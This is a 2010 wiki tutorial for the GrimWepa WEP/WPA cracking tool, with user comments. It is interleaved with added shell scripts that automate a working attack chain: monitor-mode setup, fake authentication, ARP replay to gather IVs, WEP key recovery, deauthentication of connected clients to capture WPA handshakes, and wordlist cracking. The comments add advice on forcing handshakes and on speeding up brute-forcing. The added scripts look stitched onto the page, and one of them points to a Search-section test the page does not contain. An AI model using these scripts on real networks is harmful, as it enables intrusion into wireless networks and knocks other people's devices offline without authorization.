Tutorial  
How-to on GrimWepa
Featured
Updated Feb 20, 2010 by der...@gmail.com

GRIMWEPA TUTORIAL

Start Up

To run GrimWepa, open a console, change to the directory containing the JAR file, and type (as root, since airmon-ng and the other aircrack-ng tools GrimWepa calls need raw access to the wireless interface):

java -jar grimwepa_X.X.jar

(X.X being the version you have). This loads the program and displays the GUI within a few seconds.

When GrimWepa first loads, it checks whether any device is in monitor mode. Monitor mode is a state some wifi cards support in which the card passes every 802.11 frame it hears on the channel up to the host, not only the frames addressed to it. This is crucial for collecting the data packets needed to crack WEP access points and the handshake frames needed for WPA.

If no device is found in monitor mode, GrimWepa enumerates all wifi devices it can see and asks you to select one to put into monitor mode. Once you select a device and press "OK", GrimWepa puts it into monitor mode using airmon-ng, adds the resulting interface to the list of Wifi Devices, and selects it automatically.

Once we have a selected wifi device, we can begin to search for targets.
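The same start-up check done by hand, as an added example (shell, not GrimWepa's own Java code): it reads iwconfig output to find an interface that is already in monitor mode and otherwise creates one with airmon-ng, exactly the decision the GUI makes. The interface names and the iwconfig sample are constructed, and it assumes you run it as root with the aircrack-ng suite and iwconfig installed.

```shell
#!/bin/sh
# Added example, not GrimWepa's code. Mirrors GrimWepa's start-up check:
# use an interface already in monitor mode, otherwise create one.
# Assumes root, the aircrack-ng suite in PATH and wireless-tools' iwconfig.

# Print the names of interfaces whose iwconfig block says "Mode:Monitor".
# iwconfig prints each interface name at column 1 and indents the rest of
# that interface's block, so remember the last unindented name seen.
monitor_ifaces() {
    awk '/^[^ \t]/ { iface = $1 } /Mode:Monitor/ { print iface }'
}

# Print every wireless interface, i.e. the candidates GrimWepa lists in its
# "select a device" dialog when nothing is in monitor mode yet.
wireless_ifaces() {
    awk '/^[^ \t]/ && !/no wireless extensions/ { print $1 }'
}

# Print a monitor-mode interface, creating one with airmon-ng from $1 (or
# the first wireless interface) if none exists. Re-reads iwconfig instead of
# parsing airmon-ng's own output, whose wording changed across versions.
ensure_monitor() {
    mon=$(iwconfig 2>/dev/null | monitor_ifaces | head -n 1)
    if [ -z "$mon" ]; then
        dev=${1:-$(iwconfig 2>/dev/null | wireless_ifaces | head -n 1)}
        [ -n "$dev" ] || { echo "no wireless interface found" >&2; return 1; }
        airmon-ng start "$dev" >/dev/null
        mon=$(iwconfig 2>/dev/null | monitor_ifaces | head -n 1)
    fi
    [ -n "$mon" ] || { echo "airmon-ng did not create a monitor interface" >&2; return 1; }
    echo "$mon"
}

# Constructed iwconfig output (not captured from a real machine) used to
# exercise the parsers offline: one managed card and one monitor interface.
SAMPLE_IWCONFIG='lo        no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm

mon0      IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off'

# Usage on a real box: mon=$(ensure_monitor wlan0) && echo "capturing on $mon"
```

If the interface you select in GrimWepa does not show up in monitor_ifaces, it is not really in monitor mode, which is the usual cause of the FileNotFoundException mentioned in the next section.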


Search

Click the "Refresh Targets" button to begin the search for targets. If you want to only search a specific channel, uncheck the "All Channels" option and drag the slider to the channel you want to stay on.

After a few seconds (usually around 5), access points should appear in the list. Some people have reported a FileNotFoundException printout in the console. This is usually caused by selecting a Wifi Device that is not actually in monitor mode; check with iwconfig that the selected interface reports Mode:Monitor.

Note: GrimWepa runs airodump-ng in an XTerm window (minimized by default); maximize it to see the raw airodump-ng output. GrimWepa ONLY ADDS WEP AND WPA/WPA2 access points to the list! If you are surrounded by OPEN networks and nothing else, the list will remain empty!

Once you see your target in the list, click "Stop Refreshing", select the target, and start the attack that matches its encryption, WEP or WPA.
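What "Refresh Targets" does under the hood, as an added shell example (not GrimWepa's code): run airodump-ng with CSV output, keep only the WEP/WPA/WPA2 rows of that CSV (optionally locked to one channel, like the "All Channels" box), and list the clients airodump-ng has seen associated with a chosen AP, which is the client list the WPA tab later offers. The interface name, BSSIDs and the CSV sample are constructed; the column layout is airodump-ng's, with the AP table first and the station table after a blank line.

```shell
#!/bin/sh
# Added example, not GrimWepa's code. Reproduces "Refresh Targets": scan
# with airodump-ng, then filter its CSV the way GrimWepa's target list does.
# Interface name, BSSIDs and the sample CSV below are assumed/constructed.

# The scan GrimWepa runs in its XTerm: all channels, or -c <n> when the
# "All Channels" box is unchecked. Writes scan-01.csv (and scan-01.cap).
scan() {
    iface=$1; chan=${2:-}
    if [ -n "$chan" ]; then
        airodump-ng -c "$chan" -w scan "$iface"
    else
        airodump-ng -w scan "$iface"
    fi
}

# Print "BSSID channel privacy ESSID" for every AP in an airodump-ng CSV
# whose Privacy column mentions WEP or WPA, like GrimWepa's target list.
# Usage: targets scan-01.csv [channel]; "-" reads the CSV from stdin.
targets() {
    awk -F',' -v chan="${2:-}" '
        /^Station MAC/ { exit }              # client table follows the AP table
        /^BSSID/ || NF < 14 { next }         # header or blank line
        {
            for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i)
            if ($6 !~ /WEP|WPA/) next        # OPN networks are never listed
            if (chan != "" && $4 != chan) next
            print $1, $4, $6, $14
        }' "${1:--}"
}

# Print the station MACs airodump-ng saw associated with AP $1, taken from
# the second table of the CSV. Usage: clients_of 00:11:22:33:44:66 scan-01.csv
clients_of() {
    awk -F',' -v ap="$1" '
        /^Station MAC/ { stations = 1; next }
        !stations || NF < 6 { next }
        {
            gsub(/^[ \t]+|[ \t]+$/, "", $1); gsub(/^[ \t]+|[ \t]+$/, "", $6)
            if ($6 == ap) print $1
        }' "${2:--}"
}

# Constructed CSV in airodump-ng's layout (not a real capture): a WEP AP on
# channel 6, a WPA2 AP on 11, an open AP, then the station table.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-02-20 10:00:00, 2010-02-20 10:05:12,  6,  54, WEP, WEP, , -41,  312, 12345,   0.  0.  0.  0,   8, homewep1,
00:11:22:33:44:66, 2010-02-20 10:00:01, 2010-02-20 10:05:12, 11,  54, WPA2, CCMP, PSK, -55,  120,     0,   0.  0.  0.  0,   7, cafewpa,
00:11:22:33:44:77, 2010-02-20 10:00:03, 2010-02-20 10:05:10,  6,  54, OPN,  , , -70,   40,     0,   0.  0.  0.  0,   9, freewifi1,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2010-02-20 10:01:00, 2010-02-20 10:05:11, -50,  200, 00:11:22:33:44:66, cafewpa
AA:BB:CC:DD:EE:02, 2010-02-20 10:02:00, 2010-02-20 10:05:00, -60,   15, (not associated), homewep1,other'

# Usage on a real box: scan mon0 6 &  sleep 10;  targets scan-01.csv 6
```

The open AP (freewifi1) never appears in the output, which is the behaviour the note above describes; the station table is also where the "# IV" and client information used by the WEP and WPA attacks come from.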


Attacks

WEP

There are 5 kinds of WEP attacks, each corresponding to an aireplay-ng attack mode:

  • Arp-replay (aireplay-ng -3),
  • Chop-chop (aireplay-ng -4),
  • Fragmentation (aireplay-ng -5),
  • Cafe-latte (aireplay-ng -6),
  • p0841 (aireplay-ng -2 interactive replay with -p 0841, which replays any captured data frame).
Some attacks only work with certain access points. I have had the most luck with ARP-replay (on an access point with client activity) and Fragmentation (on an access point with no clients or activity). Your own wifi card and access points will vary, so find a method that works for you.

It is not necessary to change your MAC address ("Change MAC" button) to crack WEP successfully, but an access point that filters by MAC address will only accept fake authentication and replayed frames from a whitelisted address. Use Change MAC if the other methods are unsuccessful.

GrimWepa automatically starts aircrack-ng after it has collected 10,000 IVs (initialization vectors; every captured WEP data packet carries one, which is why airodump-ng's "Data" count is what matters). You can start the cracker before that point by clicking Start Cracking. This is not recommended, since the chances of cracking a WEP key with fewer than 10,000 IVs are low; also, if the key IS found just before 10,000 IVs have been captured, GrimWepa MAY ignore the first result and start the cracking session over (this is a known bug).

When aircrack-ng (run by GrimWepa) has recovered the WEP key, GrimWepa displays it in the status bar and also saves it to a text file "wepcracked.txt" in the same directory as the JAR file.
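The ARP-replay variant of this procedure driven from the shell, as an added example that is not GrimWepa's code: capture on the target's channel, fake-authenticate, replay ARP requests, wait until the airodump-ng CSV shows the 10,000-IV threshold, then hand the capture to aircrack-ng once and record the key in wepcracked.txt. Starting the cracker exactly once avoids the restarted-session bug mentioned above. Assumed: a monitor interface (mon0), a BSSID and channel taken from the target list, and aircrack-ng's "KEY FOUND! [ xx:xx:xx:xx:xx ]" success line; the CSV and transcript samples are constructed.

```shell
#!/bin/sh
# Added example, not GrimWepa's code. Drives the ARP-replay WEP attack the
# GUI wraps and starts aircrack-ng at the 10,000-IV threshold it uses.
# Assumed: mon0, a BSSID/channel from the target list, and aircrack-ng's
# "KEY FOUND! [ ... ]" output line. Samples below are constructed.

IV_THRESHOLD=10000       # GrimWepa starts cracking here
KEYFILE=wepcracked.txt   # GrimWepa's key file, next to the JAR

# Print the "# IV" column (field 11) of the airodump-ng CSV row for AP $1,
# or 0 if the file or the row does not exist yet. "-" reads stdin.
iv_count() {
    f=${2:--}
    if [ "$f" != "-" ] && [ ! -f "$f" ]; then echo 0; return 0; fi
    awk -F',' -v ap="$1" '
        /^Station MAC/ { exit }
        { gsub(/^[ \t]+/, "", $1); gsub(/[ \t]+/, "", $11) }
        $1 == ap { print $11 + 0; found = 1; exit }
        END { if (!found) print 0 }' "$f"
}

# Pull the hex key out of aircrack-ng output on stdin; prints nothing and
# returns 1 if the run did not end in KEY FOUND.
wep_key_from_output() {
    key=$(tr -d '\r' | sed -n 's/.*KEY FOUND! *\[ *\([0-9A-Fa-f:]*\) *].*/\1/p' | head -n 1)
    [ -n "$key" ] && echo "$key"
}

# Usage: wep_attack mon0 00:11:22:33:44:55 6
wep_attack() {
    iface=$1; bssid=$2; chan=$3
    ourmac=$(cat "/sys/class/net/$iface/address")   # or the MAC set with "Change MAC"
    prefix=wep_$(echo "$bssid" | tr -d ':')

    airodump-ng -c "$chan" --bssid "$bssid" -w "$prefix" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3
    # Fake authentication: the AP must accept our MAC or it drops the
    # replayed frames. A MAC-filtering AP only passes a whitelisted address.
    if ! aireplay-ng -1 0 -a "$bssid" -h "$ourmac" "$iface"; then
        echo "fake authentication failed (distance, driver, or MAC filtering)" >&2
        kill "$dump_pid" 2>/dev/null
        return 1
    fi
    # ARP replay: every replayed request makes the AP emit a fresh IV.
    aireplay-ng -3 -b "$bssid" -h "$ourmac" "$iface" >/dev/null 2>&1 &
    replay_pid=$!

    until [ "$(iv_count "$bssid" "$prefix-01.csv")" -ge "$IV_THRESHOLD" ]; do
        sleep 10
        echo "IVs: $(iv_count "$bssid" "$prefix-01.csv") / $IV_THRESHOLD"
    done
    # aircrack-ng keeps reading the growing .cap and retries by itself every
    # 5000 new IVs, so it is started exactly once (no restarted sessions).
    key=$(aircrack-ng -b "$bssid" "$prefix-01.cap" | wep_key_from_output) || true
    kill "$replay_pid" "$dump_pid" 2>/dev/null
    [ -n "$key" ] || { echo "aircrack-ng gave up" >&2; return 1; }
    echo "$bssid $key" >> "$KEYFILE"
    echo "$key"
}

# Constructed samples (not real runs) so the parsers can be checked offline.
SAMPLE_CSV_WEP='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-02-20 10:00:00, 2010-02-20 10:05:12,  6,  54, WEP, WEP, , -41,  312, 12345,   0.  0.  0.  0,   8, homewep1,
00:11:22:33:44:66, 2010-02-20 10:00:01, 2010-02-20 10:05:12, 11,  54, WPA2, CCMP, PSK, -55,  120,     0,   0.  0.  0.  0,   7, cafewpa,'
SAMPLE_AIRCRACK_WEP='Aircrack-ng 1.0
[00:00:12] Tested 1514 keys (got 12345 IVs)
KEY FOUND! [ 1A:2B:3C:4D:5E ]
Decrypted correctly: 100%'
```

If the IV counter stays flat after fake authentication succeeded, the card is not injecting (the test at the end of the Search section, aireplay-ng -9, tells you that) or the AP simply is not answering the replayed ARP frames, in which case the Fragmentation attack is the next thing to try.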


WPA

Cracking a WPA/WPA2-PSK access point means recovering the passphrase offline from a captured 4-way handshake, so the first step is to capture one.

A handshake is only sent when a client connects (or reconnects) to the access point, and your card must hear both sides of it. The Deauthentication attack tries to deauthenticate a client (if one is selected) or every client of the access point (if no client is selected). To increase your chances of getting a handshake, get as close as possible to the access point and wait for someone to connect. If a client is already connected, select its MAC address so GrimWepa deauthenticates it, forcing it to reconnect and repeat the handshake where airodump-ng can capture it.

After a handshake is received, the "Start Cracking" button becomes enabled.

You can type in the path of a password list you would like to use, or type the path to a non-existent file (e.g. 'use_default_damnit') to force GrimWepa to use its default password list. The default list contains about 250,000 passwords (all at least 8 characters long, the minimum length of a WPA passphrase) that I compiled from many different wordlists. Backtrack 4 also has a wordlists folder at /pentest/passwords/wordlists/ with at least one file in it (darkc0de.lst).
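The WPA tab's workflow from the shell, as an added example that is not GrimWepa's code: capture on the AP's channel, deauthenticate a selected client (or the whole AP) until a handshake is in the .cap, then run aircrack-ng with a wordlist, falling back to the default list when the path given does not exist, which is the 'use_default_damnit' trick above. It also cracks a capture you already have (wpa_crack), without re-capturing. Assumed: mon0, a BSSID/channel/client from the target list, the Backtrack 4 wordlist path from the tutorial as the default, and aircrack-ng's messages "Passphrase not in dictionary" (handshake present, list exhausted), "No valid WPA handshakes found" and "KEY FOUND! [ passphrase ]"; the transcript fragments are constructed.

```shell
#!/bin/sh
# Added example, not GrimWepa's code. Handshake capture by deauthentication
# plus dictionary cracking, with the same wordlist fallback as the GUI.
# Assumed: mon0, target details from the scan, the BT4 wordlist path, and
# the aircrack-ng messages named in the comments. Samples are constructed.

DEFAULT_WORDLIST=/pentest/passwords/wordlists/darkc0de.lst   # BT4 path from the tutorial
DEAUTH_ROUNDS=6          # deauth bursts to send before giving up
WAIT_AFTER_DEAUTH=15     # seconds to let the client reconnect and re-handshake

# The wordlist to use: $1 if it names an existing file, else the default.
choose_wordlist() {
    if [ -n "$1" ] && [ -f "$1" ]; then echo "$1"; else echo "$DEFAULT_WORDLIST"; fi
}

# Reads aircrack-ng output on stdin and returns 0 when it shows a usable
# handshake. Assumption: with a handshake present but the wordlist exhausted
# aircrack-ng prints "Passphrase not in dictionary" (and lists the network as
# "WPA (1 handshake)"); with none it prints "No valid WPA handshakes found".
has_handshake() {
    tr -d '\r' | grep -qE 'WPA \([1-9][0-9]* handshake|Passphrase not in dictionary'
}

# Ask aircrack-ng whether capture $2 holds a handshake for AP $1, feeding an
# empty wordlist on stdin so it cannot start a real cracking run.
capture_has_handshake() {
    echo "" | aircrack-ng -a 2 -w - -b "$1" "$2" 2>/dev/null | has_handshake
}

# Passphrase from aircrack-ng WPA output on stdin, or nothing (status 1).
wpa_key_from_output() {
    key=$(tr -d '\r' | sed -n 's/.*KEY FOUND! *\[ \(.*\) ].*/\1/p' | head -n 1)
    [ -n "$key" ] && echo "$key"
}

# Crack an existing capture: wpa_crack handshake.cap 00:11:22:33:44:66 [wordlist]
wpa_crack() {
    list=$(choose_wordlist "${3:-}")
    aircrack-ng -a 2 -w "$list" -b "$2" "$1" | wpa_key_from_output
}

# Usage: wpa_attack mon0 00:11:22:33:44:66 11 [client MAC] [wordlist]
wpa_attack() {
    iface=$1; bssid=$2; chan=$3; client=${4:-}; list=${5:-}
    prefix=wpa_$(echo "$bssid" | tr -d ':')
    airodump-ng -c "$chan" --bssid "$bssid" -w "$prefix" "$iface" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3
    round=0
    until capture_has_handshake "$bssid" "$prefix-01.cap"; do
        if [ "$round" -ge "$DEAUTH_ROUNDS" ]; then
            kill "$dump_pid" 2>/dev/null
            echo "no handshake after $DEAUTH_ROUNDS deauth rounds; move closer or wait for a client" >&2
            return 1
        fi
        round=$((round + 1))
        # A targeted deauth forces one client to reconnect; without -c every
        # client of the AP is kicked (broadcast deauth).
        if [ -n "$client" ]; then
            aireplay-ng -0 5 -a "$bssid" -c "$client" "$iface" >/dev/null 2>&1
        else
            aireplay-ng -0 5 -a "$bssid" "$iface" >/dev/null 2>&1
        fi
        sleep "$WAIT_AFTER_DEAUTH"
    done
    kill "$dump_pid" 2>/dev/null
    wpa_crack "$prefix-01.cap" "$bssid" "$list"
}

# Constructed aircrack-ng output fragments (not real runs) for offline checks.
SAMPLE_WPA_HANDSHAKE='   #  BSSID              ESSID       Encryption
   1  00:11:22:33:44:66  cafewpa     WPA (1 handshake)
Passphrase not in dictionary'
SAMPLE_WPA_NO_HANDSHAKE='   1  00:11:22:33:44:66  cafewpa     WPA (0 handshake)
No valid WPA handshakes found.'
SAMPLE_WPA_FOUND='                                 KEY FOUND! [ correct horse battery ]
      Master Key     : 2E 4F 11 00'
```

Because the handshake is checked from the .cap file itself, rescanning or restarting the GUI does not lose it: keep the wpa_*-01.cap and call wpa_crack on it with whatever wordlist you like.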


Good luck!

Comment by ksa99...@gmail.com, Mar 8, 2010

I already have the 4-way handshake. How can I import it into the program without starting over? The program won't start cracking the handshake without starting over and capturing the handshake again. Thanks for the great work.

-ksa99jed@gmail.com

Comment by project member der...@gmail.com, Mar 25, 2010

You can call aircrack-ng by itself if you know where the .cap file is.

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

you have to give it a wordlist to crack.

hope that helps.

Comment by damaskin...@gmail.com, Mar 26, 2010

My AGN 4965 can't inject: 40 minutes and only 100 data packets. I'm using the p0841 attack. I need help :)

Comment by project member der...@gmail.com, Mar 29, 2010

@damaskinoss : If your wireless card can't inject, then all attacks are useless. You NEED a wireless card that supports injection.

Check out the Alfa AWUS036H-V5 wifi card ... it's reasonably cheap, very powerful, and BT4 supports injection.

Comment by renegade...@yahoo.fr, Apr 8, 2010

Is it possible to use GrimWepa with airserv-ng? I mean, I have a WGT634U that is running airserv on OpenWrt Kamikaze and I'd like to use it as a wifi card server. Thanks

Comment by project member der...@gmail.com, Apr 10, 2010

It is not possible to use GrimWepa with airserv-ng at this time. I didn't even know about airserv-ng, but I will look into it. Thanks.

Comment by xxCarpat...@gmail.com, Apr 11, 2010

I have an Alfa AWUS036H and it tells me I do not have injection support when trying to run an ARP attack. Can't figure it out. Using the drivers that came with BT4.

Comment by project member der...@gmail.com, Apr 18, 2010

@xxCarpatia: I've heard that card is very compatible with Backtrack 4. Perhaps the access point you are testing injection with won't allow it (Shared Authentication rather than Open). You should try changing the settings on your router and test again.

Comment by Gansta.L...@gmail.com, Apr 22, 2010

Hey, awesome program. I have a question: will a Belkin F5D7050 v4xxx work with injection? I keep hearing different things, so I'm not sure. I hate to be wasting my time trying to get this to work only to find out my card won't inject. I know it does go into monitor mode, though.

Comment by project member der...@gmail.com, Apr 28, 2010

@Gangsta.Logs: Not sure if that card is compatible with injection. You can google "backtrack belkin f5d7050" or check out the Backtrack HCL. If you still don't know, try asking your question at the Backtrack 4 forums.

Comment by jondon...@gmail.com, May 15, 2010

@xxCarpathia: Have you put it in monitor mode? Go to a Konsole and type the following.

To find out your interface type:

airmon-ng

then

airmon-ng start YOURINTERFACE

So mine is wlan0 so:

airmon-ng start wlan0

I have that Alfa and it does support injection.

Comment by pcubu...@gmail.com, May 21, 2010

I'm searching for a dictionary for cracking WPA?

Comment by servicep...@gmail.com, Jun 29, 2010

Good software, but it needs a TUTORIAL about dictionaries for finding WPA keys.

Comment by tooheavy...@yahoo.com, Jul 1, 2010

Hello, I seem not to be able to get the handshake between my AP and my cellphone. The cellphone rarely gets disconnected, and when it happens and it reconnects, the handshake still isn't captured. How much wait time is advised? I tried with 5 secs, 10 secs, up to 20 secs; nothing worked.

Comment by SeEn.B...@gmail.com, Aug 25, 2010

Can you include cowpatty when I use a dictionary attack? And another idea: if I got the handshake and make a new scan, I lose it; the handshake must stay so I can try to crack it again. The program can't hack WEP SKA; I tried many times, and when I use the console command it works?? I guess some kind of bugs need to be fixed. Thanks a lot, man, for the great tool.

Comment by fangzhen...@gmail.com, Aug 26, 2010

A totally amazing little tool... However, I have a little problem here: my wireless card is a D-Link DWA-160 A1. When I clicked "Test injection" it told me "29/30 96%", so it is working, but when I try to crack any WEP-encrypted APs I can't capture any data or IVs... Can someone explain this to me? Is it because of my wireless card driver? Thanks again for the author's hard work.

Comment by project member der...@gmail.com, Aug 26, 2010

@fangzhenyuinca: Your problem is your wireless card driver. Here's an article on Backtrack 4 discussing how to update your drivers properly (the DLINK DWA 160A1 is on the list): http://www.backtrack-linux.org/forums/backtrack-howtos/1042-how-get-ar9170-chipset-usb-adapter-working.html

@seen.bawl: I didn't include cowpatty because I felt that the program had enough options. If you want to see cowpatty included, the source code is available on this site and the project is open source. Feel free to contribute to the project yourself.

I don't get paid to add features (surprise!), so I'm done taking requests for cowpatty/airolib-ng/hashtables.

I wanted to add the ability to crack WEP networks with SKA (Shared Key Authentication). However, I haven't been able to get the WEP SKA attack to work on my router, so I am unable to program it (it's hard to program something you cannot test). If I get a new wireless router that is vulnerable to the WEP SKA attack (doubtful that I would "downgrade"), then I will include that feature in the next version.

Comment by bozbil...@gmail.com, Sep 6, 2010

I have the Alfa 1000 mW (5 dBi antenna). Your software (ver 1.10a6) is telling me "Grimwepa is unable to fake-authenticate with the router", and it lists the possible reasons: 1) you are too far from the router, 2) the wireless card is not powerful enough, 3) the wireless chipset does not support injection.

If we consider the high prestige of this card, would you say the reason for not being able to fake-authenticate is that I am too far from the router?

iwconfig lists the power of my card as 20 dBm. Should I increase its power?

Thanks a lot and congrats for such a nice piece of software.

Comment by project member der...@gmail.com, Sep 12, 2010

My guess is that you are too far from the router. Then again, this problem isn't so much about grimwepa as it is about you: your operating system, your drivers, your chipset, your wireless device, and aireplay-ng/airodump-ng. I would search aircrack-ng's site for more info (http://www.aircrack-ng.org/doku.php?id=fake_authentication). Once you get fake-authentication working by typing in the commands one-by-one, then you can understand where your problem lies (if you even have one).

Also, the Alfa AWUS036H card is not as 'prestigious' as you may think: http://www.backtrack-linux.org/forums/experts-forum/31277-alfa-awus036h-dissapointment.html

Survey says: Over-hyped.

Also, I'm not updating or fixing grimwepa anymore; you can check out my new project if you like: http://code.google.com/p/wifite/ it's a wep/wpa cracking script written in python. you might have better luck with it.

Comment by jamilari...@gmail.com, Nov 5, 2010

Is there any way to increase the speed of WPA brute-forcing?

Comment by project member der...@gmail.com, Nov 5, 2010

@jamilarif55:

Yes, you can speed up brute-forcing:

PYRIT: http://code.google.com/p/pyrit/

Precomputed hash tables: http://wirelessdefence.org/Contents/coWPAttyMain.htm

online WPA password cracker: http://tools.question-defense.com/wpa-password-cracker/ TADA

Comment by jamilari...@gmail.com, Nov 6, 2010

Pyrit is not working... Give the link to the cowpatty video for speeding up brute-forcing.

Comment by jamilari...@gmail.com, Nov 6, 2010

The aircrack-ng -r (database file) (cap file) step is not working in PYRIT...

Comment by miwebmed...@gmail.com, Nov 30, 2010

Hats off and a bow to the guy who wrote this program. I paid my dues doing it the old way, typing out the commands by hand, but this is so much easier, and fast.

I'm using the Alfa AWUS036H with a 9 dB antenna; iwconfig shows it putting out 27 dB. Occasionally I will get the error the guy mentioned in an earlier post, but I found it was because the AP was just too far away. Select a WEP AP and hit injection test; sometimes it says it failed, but hitting the button again shows a success (I almost always need to hit it more than once). If you get an error saying unable to fake-authenticate, ignore it and click yes to continue; it may take a good 5 minutes or more, but eventually the data packets will start climbing like crazy (I set my injection rate to 1000 ppp max; the ALFA will do 999 ppp no problem, lower it to 600 if it's a weak AP).

I like that the newer version of GrimWepa matches client MAC to BSSID; it was very confusing in the version that came with BT4. I had some problems capturing any WPA handshake with GrimWepa, so I attempted it with airodump and found that the results were the same (probably too far away). Went back to GrimWepa, locked onto the AP, drove to the gas station and came back to find it had captured a handshake, to my surprise. I guess the key to success is patience.

Comment by edgarter...@gmail.com, Mar 19, 2011

Hey, I did all of that but I don't have the status bar. How can I get it?

Comment by baligh...@gmail.com, Jun 4, 2011

How do I get GrimWepa working under Mandriva Xtreme 2009?

Comment by SeEn.B...@gmail.com, Jul 15, 2011

Hi man, how are you? At this moment I'm using GrimWepa; it's really a very good program. Can you please come back and work on it again? It's good, stronger and easier to use than the new script wifite. I'm waiting day after day to see a new update for this great tool. You did a great job, and I hope you will work on GrimWepa again and make it stronger than before.

Thanks a lot

Comment by muru...@gmail.com, Apr 8, 2012

Hi, I use GrimWepa in BT5 and I have a view problem with it: I can't see the full GrimWepa window, I only see the upper part.

Comment by franck.b...@gmail.com, May 24 (3 days ago)

Fixed now?

